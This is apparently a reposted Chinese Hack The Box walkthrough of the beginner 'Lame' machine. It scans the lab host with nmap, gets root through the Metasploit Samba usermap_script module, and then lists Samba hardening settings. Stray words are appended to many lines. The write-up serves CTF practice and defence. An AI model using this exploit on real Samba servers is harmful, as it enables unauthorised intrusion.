【HTB系列】 Lame

 

本文做者:shavchen安全

01 前言

此次挑戰的靶機是Lame,距今900天+,歷史感十足網絡

靶機描述
Lame is a beginner level machine, requiring only one exploit to obtain root access.
It was the first machine published on Hack The Box and was often the first machine for new users prior to its retirement.tcp

技能收穫:Smaba漏洞利用ide

02 信息收集

基本信息
Kali ip :10.10.14.3
Lameip:10.10.10.3測試

通訊正常,延時偏高網站

端口掃描ui

nmap -sV -A -p- 10.10.10.3

啊,Sambablog

03 漏洞利用

靶機開啓了Smaba服務,那還有什麼好說的接口

search Samba

選擇exploit/multi/samba/usermap_script網絡安全

use exploit/multi/samba/usermap_script
set rhosts 10.10.10.3
exploit

emem,至此完成?靶機簡單,那咱們加固一下吧

04 安全加固

查看samba版本

修改配置文件,位置:/etc/samba/smb.conf

  1. 不使用明文密碼
#加入參數
encrypt passwords=yes
smb passwd file=/etc/samba/smbpasswd

這樣,當security=user時,經過/etc/samba/smbpasswd文件進行驗證,驗證過程無明碼傳輸

  1. 不使用共享級別的安全
    當security=share的時候,samba安全性比較差,靈活性不強,因此應避免使用共享級別安全

  2. 限制網絡接口訪問
    這個適用於多網卡用戶,限制samba只響應來自內網的用戶請求

interfaces=192.168.1.1/24 127.0.0.1
bind interfaces only=yes
  1. 控制訪問列表
#ip控制
hosts deny=ALL
hosts allow=192.168.1.0/24 127.0.0.1
#主機控制
hosts deny=ALL
hosts allow=win01,win02,win05
#用戶控制,容許用戶smb01,smb02與組samba,admin訪問
valid users=smb01,smb02,@samba@admin
  1. 配置iptables
    samba常常被配置在有雙網卡的機器上,samba作爲內網專用服務,應該隔絕外網以保護samba,這裏能夠使用iptables封鎖如下端口,不容許外網訪問137,138,139端口!
iptables -t filter -A INPUT  -p tcp --dport 139 -j DROP
  1. 升級samba版本
apt-get install samba



轉載請聯繫做者並註明出處!

Ms08067安全實驗室專一於網絡安全知識的普及和培訓。團隊已出版《Web安全***:***測試實戰指南》,《內網安全***:***測試實戰指南》,《Python安全***:***測試實戰指南》,《Java代碼安全審計(入門篇)》等書籍。團隊按期分享關於CTF靶場、內網***、APT方面技術乾貨,從零開始、以實戰落地爲主官方網站:https://www.ms08067.com/

相關文章
相關標籤/搜索